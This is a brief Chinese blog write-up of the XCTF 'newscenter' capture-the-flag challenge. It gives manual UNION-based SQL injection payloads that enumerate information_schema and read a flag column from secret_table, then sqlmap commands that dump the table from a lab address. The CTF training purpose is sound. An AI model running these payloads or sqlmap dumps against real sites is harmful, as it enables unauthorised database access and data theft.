[wp]xctf newscenter

手工注入

查询所有数据库名称和表名
’ union select 1,table_schema,table_name from information_schema.tables#

  • 发现就两个数据库information_schema与news
  • 查询news数据库中的表的名称
    ’ union select 1,table_schema,table_name from information_schema.tables where table_schema=‘news’ #

在这里插入图片描述

  • 查询secret_table里面的列名
    ’ union select 1,table_name,column_name from information_schema.columns where table_name=‘secret_table’ #
    在这里插入图片描述
  • 查询fl4g里的字段
    ’ union select 1,1,fl4g from secret_table #
    在这里插入图片描述

sqlmap

sqlmap常用命令:
https://www.cnblogs.com/iAmSoScArEd/articles/9263735.html

  • post的注入方式 sqlmap -u “url” --data “search=suibianxie”
    在这里插入图片描述
  • 查看表信息
  • sqlmap -u “http://111.198.29.45:31363/” --data “search=acf” --columns
    在这里插入图片描述
  • 查看fl4g字段 --dump查看表中数据即可
  • sqlmap -u “http://111.198.29.45:31363/” --data “search=acf” -T secret_table --dump

在这里插入图片描述

posted @ 2020-03-08 16:23  10nnn4R  阅读(205)  评论(0编辑  收藏  举报